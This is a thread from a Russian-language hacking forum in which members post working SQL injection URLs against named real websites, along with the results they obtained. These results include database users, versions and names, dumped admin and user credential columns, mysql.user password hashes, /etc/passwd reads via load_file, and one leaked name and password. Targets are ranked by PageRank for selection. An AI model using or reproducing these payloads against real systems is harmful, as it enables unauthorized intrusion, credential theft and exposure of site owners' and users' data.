SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. nemaniak

    nemaniak Elder - Старейшина

    Joined:
    10 Jun 2008
    Messages:
    195
    Likes Received:
    161
    Reputations:
    108
    knittingtradejournal.com PR-3

    Code:
    http://www.knittingtradejournal.com/news_details.php?id=-1173+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9+--+
    Code:
    5.0.45-community-log:[email protected]:knittingtradejournal
    imatek.co.uk PR-3 blind

    Code:
    http://www.imatek.co.uk/news-item.php?id=5+and+1=IF(ASCII(SUBSTRING((SELECT+version()),1,1))=53,1,0)
    version: 5.0.45
    user: [email protected]
    database: cmsimatek

    Колонки таблы cms_users

    PHP:
    access         
    avatar          
    email       
    fullname       
    id      
    lastlogin   
    lastloginstatus 
    password
    username 
    users
    beeliefbotanics.com PR-4 фарма

    Code:
    http://www.beeliefbotanics.com/news.php?articleref=15+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6+--+
    Code:
    5.0.45-log:[email protected]:beeliefbot1
     
    #10881 nemaniak, 17 Oct 2009
    Last edited: 17 Oct 2009
    1 person likes this.
  2. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    Version: 4.1.22-standard-log
    database: chestisv_klub
    User: chestisv_klub@localhost
     
    2 people like this.
  3. min7

    min7 Elder - Старейшина

    Joined:
    3 Sep 2005
    Messages:
    117
    Likes Received:
    85
    Reputations:
    11
    Code:
    http://www.[COLOR=Olive]planeta-sirius.ru[/COLOR]/index.php?p=11&kod=-14+union+select+concat_ws(char(58,58),user(),database(),version()),2,3--  
    [email protected]::weber::4.1.22-log
    тиц 170 пр 4
     
    1 person likes this.
  4. Swift

    Swift Banned

    Joined:
    27 Oct 2008
    Messages:
    78
    Likes Received:
    156
    Reputations:
    8
    Sybase ASE

    http://www.inthebreeze.com/index.php?action=Products&rowid=manufacturer&manuid=1+and+1=convert(integer,(select+@@version))


    Adaptive Server Enterprise/11.9.2.3/1159/P/SWR 9223 ESD 3/Linux Intel/Linux 2.2.5-15 i586/OPT/Tue Sep 5 06:37:26 2000
     
    1 person likes this.
  5. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,619
    Likes Received:
    432
    Reputations:
    234
    http://www.nlwaterpolo.nl/history/index.php?id=-40+union+select+database()+--+&pid=6
    nlwaterpolo_nl_-_db

    http://www.fwrema.ch/history/index.php?page=040000&id=-195+union+select+1,2,3,4,5,6+/*+&pics=history/1990/Reglement_Rettungsdienst

    http://www.hooplife.ca/viewArticle.php?id=-327+union+select+1,concat_Ws(0x3a3a,ID,user,pass,thegroup),3,4,5,6,7+from+cmsusers+--+

    http://www.stevaroshop.nl/showall.php?id=-67+union+select+1,2,3,4,5,6+--+

    http://www.ramcc.org/showall.php?id=-136+union+select+1,2,concat_ws(0x3a3a,nombre,pass),4,5,6,7,8,9,10,11+from+usuarios+limit+1,1+--+
     
    2 people like this.
  6. hack-win32

    hack-win32 Member

    Joined:
    11 Oct 2009
    Messages:
    31
    Likes Received:
    37
    Reputations:
    1
    pacmate_stfr1@localhost:pacmate_stfr1:5.0.85-community
    Code:
    http://www.pacmategear.com/user.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,user(),database(),version()),6,7,8,9,10,11--
    

    geogoing@localhost:geogoing:5.1.39
    Code:
    http://www.geogoing.com/user.php?id=-45+union+select+1,2,3,concat_ws(0x3a,user(),database(),version()),5--
    

    u70694110@cgihost:d60627246:5.0.77-log
    Code:
    http://www.fairnessforfarmers.ca/news_one.php?id=-13+union+select+1,2,3,concat_ws(0x3a,user(),database(),version())--
    

    [email protected]:nrskf1:5.0.40-log

    Code:
    http://www.skf1.cn/news_one.php?id=-23+union+select+concat_ws(0x3a,user(),database(),version()),2,3,4,5--

    cpobg_krindo@localhost:cpobg_krindo:5.0.81-community-log
    Code:
    http://www.cpo-bg.com/news_one.php?id=-4+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6--
    
     
    1 person likes this.
  7. min7

    min7 Elder - Старейшина

    Joined:
    3 Sep 2005
    Messages:
    117
    Likes Received:
    85
    Reputations:
    11
    Code:
    http://www.[COLOR=Olive]premer-mebel.ru[/COLOR]/shop/?dir=-1+union+select+1,concat_ws(char(58,58),user(),database(),version()),3,4,5,6,7,8--&pid=34  
    premermebel@localhost::db_premermebel::5.0.51a-community
    Колонки в таблице pm_fsadmins
     
    1 person likes this.
  8. nikp

    nikp Banned

    Joined:
    19 Sep 2008
    Messages:
    328
    Likes Received:
    591
    Reputations:
    764
    zari1_ph@localhost : 4.1.14
    http://www.megaworldmakati.com/payment.php?id=-3+union+select+1,concat_ws(0x203a20,user(),version()),3,4,null,6,7,8,9,10+from+mysql.user--

    4.1.22-standard-log : root@localhost
    http://www.santaluciahighlands.com/profile.php?id=-1+union+all+select+1,concat_ws(0x203a20,version(),user(),host,user,password,file_priv),3,4,5,6,7,8,9,10,11,12,13,14,15+from+mysql.user
    http://www.santaluciahighlands.com/profile.php?id=-1+union+all+select+1,load_file(0x2f6574632f706173737764),3,4,5,6,7,8,9,10,11,12,13,14,15--
     
    3 people like this.
  9. Dyxxx

    Dyxxx Elder - Старейшина

    Joined:
    16 Feb 2009
    Messages:
    107
    Likes Received:
    155
    Reputations:
    24
    Ministryofrum.com pr5
    Ministry of Rum.
    Code:
    [COLOR=SlateGray]http://www.ministryofrum.com/rumdetails.php?r=500+and+substring(version(),1,1)=4+--+[/COLOR]
     
    3 people like this.
  10. nemaniak

    nemaniak Elder - Старейшина

    Joined:
    10 Jun 2008
    Messages:
    195
    Likes Received:
    161
    Reputations:
    108
    raidiofailte.com PR-6

    Code:
    http://www.raidiofailte.com/homepage_article.php?ID=-5+union+select+1,2,3,4,5,concat_ws(0x3a,version(),user(),database())+--+
    Code:
    5.0.45:[email protected]:raidiofailtedb1
    conservatoryoutlet.co.uk PR-4

    Code:
    http://www.conservatoryoutlet.co.uk/offers.php?id=336+union+select+concat_ws(0x3a,version(),user(),database())+--+
    Code:
    5.0.45:[email protected]:conOutlet
     
    5 people like this.
  11. min7

    min7 Elder - Старейшина

    Joined:
    3 Sep 2005
    Messages:
    117
    Likes Received:
    85
    Reputations:
    11
    Code:
    http://www.[COLOR=Olive]unitoys.ru[/COLOR]/index.php?r=3&man=25&l=-0+union+select+concat_ws(char(58,58),user(),database(),version())--  
    [email protected]::u76467::5.0.67-log
    тиц 30 пр 3

    Code:
    http://[COLOR=Olive]svetlinz.ru[/COLOR]/?idp=15&idn=2&ids=9&idt=-28+union+select+1,2,3,concat_ws(char(58,58),user(),database(),version()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40--  
    svetli01@localhost::wwwsvetlinzru::4.1.25-log
    тиц 10 пр 2
     
    2 people like this.
  12. LzD

    LzD Banned

    Joined:
    24 Jul 2009
    Messages:
    51
    Likes Received:
    12
    Reputations:
    2
    http://babylonia.ucsd.edu/views.php?id=6+and+1=0+union+select+1,2,3--
     
    #10892 LzD, 18 Oct 2009
    Last edited by a moderator: 18 Oct 2009
    4 people like this.
  13. TELO

    TELO Member

    Joined:
    21 Jan 2009
    Messages:
    68
    Likes Received:
    44
    Reputations:
    6
    Фан клуб ФК Оболонь 4.0.27
    Code:
    http://www.ole.obolon.ua/index.php?id=-431%20union%20select%201,2,3,4,5,6,7,login,9,password,11,12%20from%20user%20limit%2020,1/*
    Газета Весник Кипра 5.0.32-Debian_7etch1~bpo.1-log
    Code:
    http://www.cyprusadvertiser.com/misc.php?id=-30%27union%20select%201,2,login,pass%20FROM%20admin/*
    5.0.81-community-log
    Code:
    http://encycl.anthropology.ru/article.php?id=1%20union%20select%201,usr_login,usr_pass,4,5,6,7,8,9,10%20FROM%20user%20limit%201,1%20--
    http://anthropology.ru:2082/
    Фонд стратегической культуры 5.0.67-log
    Code:
    http://fondsk.ru/article.php?id=-1527%20union%20select%201,2,3,4,5,group_concat%28COLUMN_NAME+separator+0x0a%29,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20TABLE_NAME=0x706572736F6E%20--
    Shell-Shocked 4.1.22-standard
    Code:
    http://shell-shocked.org/article.php?id=-284%27%20union%20select%201,2,version%28%29,4,5,6,7,8,9,10,11%20from%20admin/*
    Какой то фестиваль музыкальный 4.1.22
    Code:
    http://www.krainamriy.com/news.php?id=-88%20union%20select%201,version%28%29,3,4,5,6,7,8,9,10,11%20--
     
    #10893 TELO, 18 Oct 2009
    Last edited: 18 Oct 2009
    3 people like this.
  14. ILYAtirtir

    ILYAtirtir Elder - Старейшина

    Joined:
    25 Apr 2007
    Messages:
    142
    Likes Received:
    246
    Reputations:
    73
    Arthouse
    Созданная в 1996 году частной шведской компанией Maywin Media AB, "Кино без границ" — первая специализированная на арт-кино дистрибьюторская кинокомпания в России.

    тИЦ: 1400
    PR: 5


    MsAccess
    Code:
    Алексей Ушаков:ddZMOspg

    European Forum For Good Clinical Practice

    MsAccess
    Code:
    227771
     
    7 people like this.
  15. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    User: vollversion@localhost
    Database: vollversion
    Version: 5.0.42
     
    3 people like this.
  16. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    Боян. Было уже.

    User: [email protected]
    Database: cmcdk2
    Version: 4.0.24-log
     
    3 people like this.
  17. Dyxxx

    Dyxxx Elder - Старейшина

    Joined:
    16 Feb 2009
    Messages:
    107
    Likes Received:
    155
    Reputations:
    24
    Viana.es.gov.br pr3
    Prefeitura Municipal de Viana.
    Code:
    [COLOR=SlateGray]http://www.viana.es.gov.br/site/index.php?target=noticia_leitura&nid=1+and+1=cast((select+chr(126)||chr(32)||current_database()||chr(32)||chr(124)||chr(32)||user||chr(32)||chr(124)||chr(32)||version()||chr(32)||chr(126))+as+int)[/COLOR]
    ~ viana | viana | PostgreSQL 8.4.1 on x86_64-pc-linux-gnu, compiled by GCC x86_64-pc-linux-gnu-gcc (GCC) 4.1.2 (Gentoo 4.1.2 p1.0.2), 64-bit ~
     
    3 people like this.
  18. nikp

    nikp Banned

    Joined:
    19 Sep 2008
    Messages:
    328
    Likes Received:
    591
    Reputations:
    764
    traintheater_db@localhost : 5.0.45
    http://www.traintheater.co.il/show.php?id=-14+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x203a20,user(),version()),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39--

    4.0.26-log : [email protected]
    http://sekolah-kita.net/info.php?aksi=detail&iden=-12+union+all+select+1,2,3,concat_ws(0x203a20,version(),user(),host,user,password,file_priv),5,6,7,8,9,10+from+mysql.user--
    http://sekolah-kita.net/info.php?aksi=detail&iden=-12+union+all+select+1,2,3,load_file(0x2F6574632F706173737764),5,6,7,8,9,10--
    доступна сессия
     
  19. min7

    min7 Elder - Старейшина

    Joined:
    3 Sep 2005
    Messages:
    117
    Likes Received:
    85
    Reputations:
    11
    Code:
    http://[COLOR=Olive]afisha.vokrug.by[/COLOR]/kino/?type=kt&kt_id=-10+union+select+1,2,3,concat_ws(char(58,58),user(),database(),version())--  
    vokrugb_portal@localhost::vokrugb_portal::5.0.81-community
    пр 3
     
    #10899 min7, 18 Oct 2009
    Last edited by a moderator: 18 Oct 2009
  20. xa-xa89

    xa-xa89 Elder - Старейшина

    Joined:
    17 May 2008
    Messages:
    108
    Likes Received:
    27
    Reputations:
    2
    PR3
    Code:
    http://la-femme.net/index.php?cat=%27+union+select+1,version%28%29+--+-
    Database version:5.0.26-log;
    Вывод в заголовок.
     
Thread Status:
Not open for further replies.